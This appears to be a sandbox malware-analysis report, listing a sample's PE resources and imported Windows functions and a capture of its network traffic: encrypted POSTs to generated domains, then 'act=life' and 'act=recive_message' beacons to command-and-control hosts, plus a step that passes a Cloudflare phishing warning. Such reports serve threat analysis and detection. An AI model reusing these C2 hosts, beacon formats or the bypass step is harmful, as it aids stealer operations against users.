Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x455908	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x4567b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x457058	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x4575f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x458498	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x458d40	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_ICON	0x44c630	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	Pakistan	0.5328341013824884
RT_ICON	0x44c630	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	India	0.5328341013824884
RT_ICON	0x44ccf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.41203319502074687
RT_ICON	0x44ccf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.41203319502074687
RT_ICON	0x44f2a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.44769503546099293
RT_ICON	0x44f2a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.44769503546099293
RT_ICON	0x44f738	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	Pakistan	0.4904051172707889
RT_ICON	0x44f738	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	India	0.4904051172707889
RT_ICON	0x4505e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	Pakistan	0.4675090252707581
RT_ICON	0x4505e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	India	0.4675090252707581
RT_ICON	0x450e88	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	Pakistan	0.4328034682080925
RT_ICON	0x450e88	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	India	0.4328034682080925
RT_ICON	0x4513f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.27769709543568466
RT_ICON	0x4513f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.27769709543568466
RT_ICON	0x453998	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	Pakistan	0.2879924953095685
RT_ICON	0x453998	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	India	0.2879924953095685
RT_ICON	0x454a40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	Pakistan	0.3069672131147541
RT_ICON	0x454a40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	India	0.3069672131147541
RT_ICON	0x4553c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.3351063829787234
RT_ICON	0x4553c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.3351063829787234
RT_STRING	0x459478	0x3dc	data	Punjabi	Pakistan	0.4605263157894737
RT_STRING	0x459478	0x3dc	data	Punjabi	India	0.4605263157894737
RT_STRING	0x459858	0x48a	data	Punjabi	Pakistan	0.4509466437177281
RT_STRING	0x459858	0x48a	data	Punjabi	India	0.4509466437177281
RT_STRING	0x459ce8	0x858	data	Punjabi	Pakistan	0.40823970037453183
RT_STRING	0x459ce8	0x858	data	Punjabi	India	0.40823970037453183
RT_STRING	0x45a540	0x404	data	Punjabi	Pakistan	0.4669260700389105
RT_STRING	0x45a540	0x404	data	Punjabi	India	0.4669260700389105
RT_STRING	0x45a948	0x3e6	data	Punjabi	Pakistan	0.467935871743487
RT_STRING	0x45a948	0x3e6	data	Punjabi	India	0.467935871743487
RT_STRING	0x45ad30	0x53e	data	Punjabi	Pakistan	0.4426229508196721
RT_STRING	0x45ad30	0x53e	data	Punjabi	India	0.4426229508196721
RT_ACCELERATOR	0x455898	0x40	data	Punjabi	Pakistan	0.890625
RT_ACCELERATOR	0x455898	0x40	data	Punjabi	India	0.890625
RT_ACCELERATOR	0x4558d8	0x30	data	Punjabi	Pakistan	0.9583333333333334
RT_ACCELERATOR	0x4558d8	0x30	data	Punjabi	India	0.9583333333333334
RT_GROUP_CURSOR	0x4575c0	0x30	data			0.9375
RT_GROUP_CURSOR	0x4592a8	0x30	data			0.9375
RT_GROUP_ICON	0x44f708	0x30	data	Punjabi	Pakistan	0.9375
RT_GROUP_ICON	0x44f708	0x30	data	Punjabi	India	0.9375
RT_GROUP_ICON	0x455830	0x68	data	Punjabi	Pakistan	0.7019230769230769
RT_GROUP_ICON	0x455830	0x68	data	Punjabi	India	0.7019230769230769
RT_VERSION	0x4592d8	0x19c	data			0.5825242718446602

DLL	Import
KERNEL32.dll	GlobalAddAtomA, InterlockedIncrement, EnumCalendarInfoW, OpenJobObjectA, GetCurrentProcess, GetModuleHandleW, GetCommConfig, GetProcessHeap, GetWindowsDirectoryA, SizeofResource, ReadProcessMemory, EnumResourceLanguagesA, CreateFileW, ExitThread, GetVolumePathNameA, FlushFileBuffers, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, GetComputerNameA, LoadLibraryA, OpenMutexA, WriteConsoleA, LocalAlloc, CreateHardLinkW, FindFirstVolumeMountPointW, BeginUpdateResourceA, GlobalFindAtomW, VirtualProtect, _lopen, GetVersionExA, FindAtomW, OpenFileMappingA, LCMapStringW, lstrcpyA, BackupWrite, GetFullPathNameW, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, InitializeCriticalSectionAndSpinCount, GetModuleHandleA, LCMapStringA, WideCharToMultiByte
USER32.dll	SetClipboardViewer
GDI32.dll	GetDeviceGammaRamp

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:13.119143009 CET	276	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aqkqgwqwxgrwmfd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 184 Host: sumagulituyo.org
Dec 22, 2023 04:57:13.119178057 CET	184	OUT	Data Raw: 48 9d 85 ca 49 62 58 2f 58 75 57 55 08 d8 55 cc 28 68 9b 11 fd 15 d8 d1 c6 6a d6 f0 0a f1 d1 e7 ff ac f8 be 76 44 e3 c7 d6 2f 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 88 f4 16 bc Data Ascii: HIbX/XuWUU(hjvD/ju".B;}f=B!bO?pRL`r(!I7L7LqWd)5i['W%<7bv?)Zq
Dec 22, 2023 04:57:13.380389929 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 03:57:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3562ceabab9629a274652462fe6a04fe\|102.129.152.212\|1703217433\|1703217433\|0\|1\|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:13.958098888 CET	273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://puuyfivujad.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: snukerukeutit.org
Dec 22, 2023 04:57:13.958139896 CET	341	OUT	Data Raw: 48 9d 85 ca 49 62 58 2f 58 75 57 55 08 d8 55 cc 28 68 9b 11 fd 15 d8 d1 c6 6a d6 f0 0a f1 d1 e7 ff ac f8 be 76 44 e3 c7 d6 2f 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fd ca 25 f9 Data Ascii: HIbX/XuWUU(hjvD/ju".B;}f=B!bO%8s6i0[&q3(De,-/:XwJ!ZeL5}2>O4b=o6E3Gh$m!\|-%<Nb2HW9x
Dec 22, 2023 04:57:14.223963022 CET	423	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 03:57:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f50b3ad3b53430c578b6d8e7694e3d22\|102.129.152.212\|1703217434\|1703217434\|0\|1\|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:15.103630066 CET	277	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fuimjhrqlldh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: lightseinsteniki.org
Dec 22, 2023 04:57:15.103660107 CET	247	OUT	Data Raw: 48 9d 85 ca 49 62 58 2f 58 75 57 55 08 d8 55 cc 28 68 9b 11 fd 15 d8 d1 c6 6a d6 f0 0a f1 d1 e7 ff ac f8 be 76 44 e3 c7 d6 2f 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b9 cb 1d f2 Data Ascii: HIbX/XuWUU(hjvD/ju".B;}f=B!bO=tbqkMi=$R"NBDfYzp0;LOB~*PQ%"#+rok}d&;OaO{4+)51!hm!SC
Dec 22, 2023 04:57:15.677803993 CET	426	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 03:57:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=40cfc66447cd29385dc8e45af84e2105\|102.129.152.212\|1703217435\|1703217435\|0\|1\|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:16.445200920 CET	272	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aldquwpfyut.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: liuliuoumumy.org
Dec 22, 2023 04:57:16.445235968 CET	348	OUT	Data Raw: 48 9d 85 ca 49 62 58 2f 58 75 57 55 08 d8 55 cc 28 68 9b 11 fd 15 d8 d1 c6 6a d6 f0 0a f1 d1 e7 ff ac f8 be 76 44 e3 c7 d6 2f 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f1 c8 3b bd Data Ascii: HIbX/XuWUU(hjvD/ju".B;}f=B!bO;2T1!hIsoW`:y&y%~\!@>Gs!3s]3^LU$\|6"}e(1'[l_,{4HEjqmSXoH
Dec 22, 2023 04:57:17.025100946 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Dec 2023 03:57:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a3782d218a4f3383abaff41dae279111\|102.129.152.212\|1703217436\|1703217436\|0\|1\|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:28.562712908 CET	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bombertublestylebanws.fun
Dec 22, 2023 04:57:28.562751055 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 04:57:29.132102966 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=lvop62v3543ereksssebij75i9; expires=Mon, 15-Apr-2024 21:44:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 03:57:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 03:57:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 03:57:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIQDZHV9JKhvTmT7rmWoYMfgjGHDle%2BFxqyMUaiaF4oRQvvxKkvGYGiAtViHFChHfeYCocP43yY2yvHoipDpmdxNergudWxZ3W%2FCcil3sUGloG9F1NgZ2HwDd04g%2FTtyaNm76Q%2FenQ2EfOGn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839 Data Raw: Data Ascii:
Dec 22, 2023 04:57:29.132116079 CET	35	IN	Data Raw: 37 30 64 64 64 39 62 64 33 33 37 31 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 70ddd9bd3371-MIAaerror #D12
Dec 22, 2023 04:57:29.132124901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:29.556427956 CET	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: neighborhoodfeelsa.fun
Dec 22, 2023 04:57:29.556457996 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 04:57:29.941330910 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9ntar3943vtlgrc8n1sfhdiqiu; expires=Mon, 15-Apr-2024 21:44:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 03:57:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 03:57:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 03:57:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OHIezOq%2BOhONd0J4%2F6cOkpC0lZYIpZja8MsyL%2FBE88bBom1C3KG68txVpglYhijItsl0PS5R9NxTYmdsaLA3QPyiF3B28OMyaviTz3Lwvno3tMgoIkejhFShxZi%2FkEitBdXnDJuOZocW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839570e Data Raw: Data Ascii:
Dec 22, 2023 04:57:29.941350937 CET	31	IN	Data Raw: 30 66 65 36 64 61 65 64 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 0fe6daed-MIAaerror #D12
Dec 22, 2023 04:57:29.941361904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 04:57:30.201464891 CET	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 04:57:30.201493025 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 04:57:30.337176085 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B84kZvG0BgEESaFkGRLc9TrLVgB5VV0gwMt8dhEoSdkumc3d6XcaadgYIPM8WNkRsdkKXbqaHw3rk79RnH0w%2BOuUEulvp7Hrcbbb2Pvsvw3dhqyKnScumjRnhP9NT6Mb5c9kjRxIAiJLBCV2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839570e8184d6dc2-MIA Data Raw: 31 32 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 Data Ascii: 1279<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.cs
Dec 22, 2023 04:57:30.337218046 CET	1286	IN	Data Raw: 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 Data Ascii: s" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window
Dec 22, 2023 04:57:30.337452888 CET	1286	IN	Data Raw: 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f Data Ascii: nformation such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="GyrHyIP
Dec 22, 2023 04:57:30.337630033 CET	1286	IN	Data Raw: 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 Data Ascii: ext-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">839570e8184d6dc2</strong></span> <span class="cf-footer-sepa
Dec 22, 2023 04:57:30.337776899 CET	151	IN	Data Raw: 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 Data Ascii: -> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 22, 2023 04:57:30.337816954 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 22, 2023 04:57:30.339874983 CET	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=GyrHyIPTi_TidMU0JuvSjzpzqFecFVgDDF7XZLeGalc-1703217450-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 79 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 04:57:30.340013027 CET	79	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4e 6d 4c 70 51 57 2d 2d 73 70 61 6d 32 26 6a 3d 37 64 39 38 36 35 32 64 65 64 38 35 31 35 65 62 34 31 32 34 63 35 33 33 61 36 37 31 63 37 61 61 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=NmLpQW--spam2&j=7d98652ded8515eb4124c533a671c7aa&ver=4.0
Dec 22, 2023 04:57:30.950367928 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 03:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=mhljheqp26l65fd9s9kpghh1q0; expires=Mon, 15-Apr-2024 21:44:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 03:57:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 03:57:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 03:57:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NjqY5JLCLbRv8me4v7w8PNcVk4ZBzLoqy7SnzxMWQT%2FyWG9V6PRSlhrrnv9eaas5FbOdghijBNdDJbt0Zpj7Rc73V7zD9oB1wwgEUjhu0427SFAkTe7dEhuBT1odTMUYDBo5HuHgn89GgtW3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839570e8f Data Raw: Data Ascii:
Dec 22, 2023 04:57:30.950395107 CET	29	IN	Data Raw: 33 39 36 64 63 32 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 396dc2-MIAaerror #D12
Dec 22, 2023 04:57:30.950406075 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

